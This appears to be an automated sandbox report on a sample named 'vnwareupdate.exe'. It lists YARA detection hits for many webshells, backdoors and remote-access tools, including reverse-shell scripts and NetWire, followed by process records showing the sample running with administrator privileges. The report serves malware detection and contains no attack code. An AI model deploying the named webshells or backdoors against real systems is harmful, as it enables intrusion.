-dfate- Molls Rule: phpshell17_php, Description: Semi-Auto-generated - file phpshell17.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: SimShell_1_0___Simorgh_Security_MGZ_php, Description: Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: jspshall_jsp, Description: Semi-Auto-generated - file jspshall.jsp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: rootshell_php, Description: Semi-Auto-generated - file rootshell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: connectback2_pl, Description: Semi-Auto-generated - file connectback2.pl.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shells_PHP_wso, Description: Semi-Auto-generated - file wso.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: backdoor1_php, Description: Semi-Auto-generated - file backdoor1.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: elmaliseker_asp, Description: Semi-Auto-generated - file elmaliseker.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: s72_Shell_v1_1_Coding_html, Description: Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: hidshell_php_php, Description: Semi-Auto-generated - file hidshell.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: kacak_asp, Description: Semi-Auto-generated - file kacak.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: PHP_Backdoor_Connect_pl_php, Description: Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Antichat_Socks5_Server_php_php, Description: Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Antichat_Shell_v1_3_php, Description: Semi-Auto-generated - file Antichat Shell v1.3.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php, Description: Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: cyberlords_sql_php_php, Description: Semi-Auto-generated - file cyberlords_sql.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html, Description: Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: EFSO_2_asp, Description: Semi-Auto-generated - file EFSO_2.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: lamashell_php, Description: Semi-Auto-generated - file lamashell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Ajax_PHP_Command_Shell_php, Description: Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: JspWebshell_1_2_jsp, Description: Semi-Auto-generated - file JspWebshell 1.2.jsp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Sincap_php_php, Description: Semi-Auto-generated - file Sincap.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Phyton_Shell_py, Description: Semi-Auto-generated - file Phyton Shell.py.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: sh_php_php, Description: Semi-Auto-generated - file sh.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: phpjackal_php, Description: Semi-Auto-generated - file phpjackal.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: sql_php_php, Description: Semi-Auto-generated - file sql.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: cgi_python_py, Description: Semi-Auto-generated - file cgi-python.py.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: ru24_post_sh_php_php, Description: Semi-Auto-generated - file ru24_post_sh.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: telnetd_pl, Description: Semi-Auto-generated - file telnetd.pl.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: php_include_w_shell_php, Description: Semi-Auto-generated - file php-include-w-shell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shell_php_php, Description: Semi-Auto-generated - file shell.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: telnet_cgi, Description: Semi-Auto-generated - file telnet.cgi.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: ironshell_php, Description: Semi-Auto-generated - file ironshell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: backdoorfr_php, Description: Semi-Auto-generated - file backdoorfr.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: aspydrv_asp, Description: Semi-Auto-generated - file aspydrv.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: cmdjsp_jsp, Description: Semi-Auto-generated - file cmdjsp.jsp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: h4ntu_shell__powered_by_tsoi_, Description: Semi-Auto-generated - file h4ntu shell [powered by tsoi, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: unknown Rule: Ajan_asp, Description: Semi-Auto-generated - file Ajan.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: PHANTASMA_php, Description: Semi-Auto-generated - file PHANTASMA.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: MySQL_Web_Interface_Version_0_8_php, Description: Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0002, Description: Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0003, Description: Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0005, Description: Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0010, Description: Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0013, Description: Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0016, Description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_php_webshells, Description: Semi-Auto-generated - from files multiple_php_webshells, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0019, Description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0022, Description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0027, Description: Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0030, Description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0031, Description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0032, Description: Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: PHP_Cloaked_Webshell_SuperFetchExec, Description: Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_dC3_Security_Crew_Shell_PRiV, Description: PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_b374k_mini_shell_php_php, Description: PHP Webshells Github Archive - file b374k-mini-shell-php.php.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Sincap_1_0, Description: PHP Webshells Github Archive - file Sincap 1.0.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_b374k_php, Description: PHP Webshells Github Archive - file b374k.php.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_h4ntu_shell__powered_by_tsoi_, Description: PHP Webshells Github Archive - file h4ntu shell [powered by tsoi, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: unknown Rule: WebShell_php_webshells_MyShell, Description: PHP Webshells Github Archive - file MyShell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_php_webshells_pHpINJ, Description: PHP Webshells Github Archive - file pHpINJ.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_ru24_post_sh, Description: PHP Webshells Github Archive - file ru24_post_sh.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_hiddens_shell_v1, Description: PHP Webshells Github Archive - file hiddens shell v1.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_c99_locus7s, Description: PHP Webshells Github Archive - file c99_locus7s.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_cgitelnet, Description: PHP Webshells Github Archive - file cgitelnet.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_lamashell, Description: PHP Webshells Github Archive - file lamashell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Simple_PHP_backdoor_by_DK, Description: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_php_webshells_README, Description: PHP Webshells Github Archive - file README.md, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_AK_74_Security_Team_Web_Shell_Beta_Version, Description: PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Gamma_Web_Shell, Description: PHP Webshells Github Archive - file Gamma Web Shell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_php_include_w_shell, Description: PHP Webshells Github Archive - file php-include-w-shell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_PhpSpy_Ver_2006, Description: PHP Webshells Github Archive - file PhpSpy Ver 2006.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_php_webshells_myshell, Description: PHP Webshells Github Archive - file myshell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_php_webshells_lolipop, Description: PHP Webshells Github Archive - file lolipop.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_simple_cmd, Description: PHP Webshells Github Archive - file simple_cmd.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_aZRaiLPhp_v1_0, Description: PHP Webshells Github Archive - file aZRaiLPhp v1.0.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall, Description: PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell__findsock_php_findsock_shell_php_reverse_shell, Description: PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Generic_PHP_6, Description: PHP Webshells Github Archive - from files c0derz shell [csh, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: unknown Rule: Unpack_Injectt, Description: Webshells Auto-generated - file Injectt.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FeliksPack3___PHP_Shells_ssh, Description: Webshells Auto-generated - file ssh.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: ZXshell2_0_rar_Folder_ZXshell, Description: Webshells Auto-generated - file ZXshell.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: thelast_orice2, Description: Webshells Auto-generated - file orice2.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FSO_s_zehir4, Description: Webshells Auto-generated - file zehir4.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: DarkSpy105, Description: Webshells Auto-generated - file DarkSpy105.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FSO_s_reader, Description: Webshells Auto-generated - file reader.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: HYTop_DevPack_server, Description: Webshells Auto-generated - file server.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: vanquish, Description: Webshells Auto-generated - file vanquish.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Simple_PHP_BackDooR, Description: Webshells Auto-generated - file Simple_PHP_BackDooR.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: hkshell_hkrmv, Description: Webshells Auto-generated - file hkrmv.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FeliksPack3___PHP_Shells_phpft, Description: Webshells Auto-generated - file phpft.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: bdcli100, Description: Webshells Auto-generated - file bdcli100.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: rdrbs084, Description: Webshells Auto-generated - file rdrbs084.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: HYTop_CaseSwitch_2005, Description: Webshells Auto-generated - file 2005.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FSO_s_casus15_2, Description: Webshells Auto-generated - file casus15.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: installer, Description: Webshells Auto-generated - file installer.cmd, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: elmaliseker, Description: Webshells Auto-generated - file elmaliseker.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: shelltools_g0t_root_Fport, Description: Webshells Auto-generated - file Fport.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: HYTop_DevPack_upload, Description: Webshells Auto-generated - file upload.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: PasswordReminder, Description: Webshells Auto-generated - file PasswordReminder.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: dbgntboot, Description: Webshells Auto-generated - file dbgntboot.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: PHP_shell, Description: Webshells Auto-generated - file shell.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: rdrbs100, Description: Webshells Auto-generated - file rdrbs100.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Mithril_Mithril, Description: Webshells Auto-generated - file Mithril.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: hkdoordll, Description: Webshells Auto-generated - file hkdoordll.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Mithril_v1_45_dllTest, Description: Webshells Auto-generated - file dllTest.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: dbgiis6cli, Description: Webshells Auto-generated - file dbgiis6cli.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Debug_cress, Description: Webshells Auto-generated - file cress.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FeliksPack3___PHP_Shells_usr, Description: Webshells Auto-generated - file usr.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: FSO_s_phpinj, Description: Webshells Auto-generated - file phpinj.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: xssshell_db, Description: Webshells Auto-generated - file db.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: EditServer_Webshell_2, Description: Webshells Auto-generated - file EditServer.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: by064cli, Description: Webshells Auto-generated - file by064cli.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Mithril_dllTest, Description: Webshells Auto-generated - file dllTest.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: connector, Description: Webshells Auto-generated - file connector.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: shelltools_g0t_root_HideRun, Description: Webshells Auto-generated - file HideRun.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: PHP_Shell_v1_7, Description: Webshells Auto-generated - file PHP_Shell_v1.7.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: xssshell_save, Description: Webshells Auto-generated - file save.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: ZXshell2_0_rar_Folder_zxrecv, Description: Webshells Auto-generated - file zxrecv.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: _root_040_zip_Folder_deploy, Description: Webshells Auto-generated - file deploy.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: by063cli, Description: Webshells Auto-generated - file by063cli.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: icyfox007v1_10_rar_Folder_asp, Description: Webshells Auto-generated - file asp.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: byshell063_ntboot_2, Description: Webshells Auto-generated - file ntboot.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: BIN_Server, Description: Webshells Auto-generated - file Server.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: HYTop2006_rar_Folder_2006, Description: Webshells Auto-generated - file 2006.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: HDConfig, Description: Webshells Auto-generated - file HDConfig.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: Webshell_and_Exploit_CN_APT_HK, Description: Webshell and Exploit Code in relation with APT against Honk Kong protesters, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pastebin_Webshell, Description: Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: netwire, Description: detect netwire in memory, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 4456 Parent PID: 2540

General

Start time:	13:46:19
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1092'
Imagebase:	0x400000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 6352 Parent PID: 2540

General

Start time:	13:46:29
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1136'
Imagebase:	0x400000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 6404 Parent PID: 2540

General

Start time:	13:46:30
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1244'
Imagebase:	0x400000
